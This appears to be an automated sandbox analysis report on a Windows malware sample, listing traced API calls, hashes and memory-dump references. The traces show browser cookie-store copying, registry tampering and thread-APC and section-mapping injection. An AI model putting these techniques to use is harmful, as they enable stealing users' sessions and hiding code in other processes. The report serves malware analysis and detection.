  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
